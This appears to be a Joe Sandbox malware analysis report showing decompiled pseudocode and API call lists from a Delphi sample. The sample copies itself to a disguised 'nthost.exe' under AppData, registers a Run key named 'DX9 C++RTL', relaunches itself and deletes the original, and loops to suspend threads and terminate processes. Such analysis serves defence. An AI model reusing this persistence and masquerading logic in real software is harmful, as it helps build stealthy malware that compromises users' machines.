    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}











    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}








    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}













    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}




    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}







    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}







    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
